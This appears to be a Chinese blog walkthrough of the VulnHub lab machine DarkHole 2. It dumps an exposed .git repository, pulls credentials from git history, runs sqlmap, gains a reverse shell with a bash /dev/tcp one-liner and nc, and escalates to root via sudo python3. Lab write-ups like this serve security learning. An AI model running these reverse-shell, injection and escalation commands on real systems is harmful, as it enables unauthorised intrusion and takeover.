vulnhub靶机-DARKHOLE: 2

参考

https://www.hackingarticles.in/darkhole-2-vulnhub-walkthrough/

https://www.freebuf.com/articles/web/292663.html

 

工具

https://github.com/arthaud/git-dumper.git

 

学习知识

1.gitdumper 工具简单使用

2.日志查看,分析

3.python提权

 

基本程序

1.确认靶机ip

2.确认开放端口

3.寻找可用端口,扫描目录,找到可用漏洞。

漏洞:

4.尝试漏洞,后渗透

 

步骤

kali ip

微信截图_20220812122323

1.确认靶机ip

微信截图_20220812121810

2.确认靶机开放端口

微信截图_20220812121906

3.寻找可用端口

开启22端口,可通过ssh连接

开启80端口,查看,为一个登陆界面

微信截图_20220812121943

nmap扫出来.git泄露,进行查看

微信截图_20220812122004

我们引入一个名为 gitdumper 的工具来改进这个 http-git 页面的美感。它是一种从网站获取 git 存储库以更好地掌握数据集的工具。

git clone https://github.com/arthaud/git-dumper.git

cd git-dumper

我们必须做的另一件事是为他们提供一个目录名称来保存这些 git 日志(在我们的例子中,我们将其命名为backup)。

mkdir backup

python3 git_dumper.py http://192.168.47.137/.git/ backup

cd backup

微信截图_20220812122856

查看login.php源码,发现登录逻辑。

微信截图_20220812123100

显示的部分正在清理输入。因此,我们无法执行 SQL 注入。但是,当我检查 git 日志时,我们会在同一个地方看到凭据。

git log

微信截图_20220812123146

git 日志中,我们看到作者在第二次提交时添加了默认凭据。因此,让我们将 HEAD 切换到该提交。

git checkout a4d9 

cat login.php

微信截图_20220812123402

获取用户名和密码 lush@admin.com/321

登录web程序

微信截图_20220812123601

发现改变id值,界面会变化。尝试sql注入

微信截图_20220812123857

bp抓包,将请求包保存到文件

微信截图_20220812121725

微信截图_20220812124034

sqlmap -r sql --dbs --batch

微信截图_20220812124145

数据库为darkhole_2,查表

sqlmap -r sql -D darkhole_2 --dump-all --batch

微信截图_20220812124401

发现用户名/密码 jehad/fool

连接ssh,成功

微信截图_20220812124521

发现此用户不能使用sudo

查看所有文件,发现含有命令记录。尝试查看此用户的命令记录

cat .bash_history

微信截图_20220812124824

发现此用户可以使用

curl "http://127.0.0.1:9999/?cmd= "

尝试发现是此用户的权限

curl "http://127.0.0.1:9999/?cmd=id"

获取losy用户shell

将反弹shell的文件下载到/tmp路径

#!/bin/bash 

bash -i >& /dev/tcp/192.168.47.137/11111 0>&1

微信截图_20220812125419

重新开启一个命令行,nc 连接

nc -lvp 11111
curl "http://127.0.0.1:9999/?cmd=bash%20/tmp/shell"

微信截图_20220812130256

在losy用户下发现user权限flag

微信截图_20220812130409

查看losy命令记录,发现密码为gang

微信截图_20220812130542

ssh连接losy用户

微信截图_20220812130800

查看losy用户的sudo权限

微信截图_20220812130847

4.权限提升

可使用python3提权

sudo python3 -c 'import os; os.system("/bin/sh")'

微信截图_20220812131140

得到root权限flag

posted @ 2022-08-12 13:16  LoYoHo00  阅读(94)  评论(0编辑  收藏  举报
levels of contents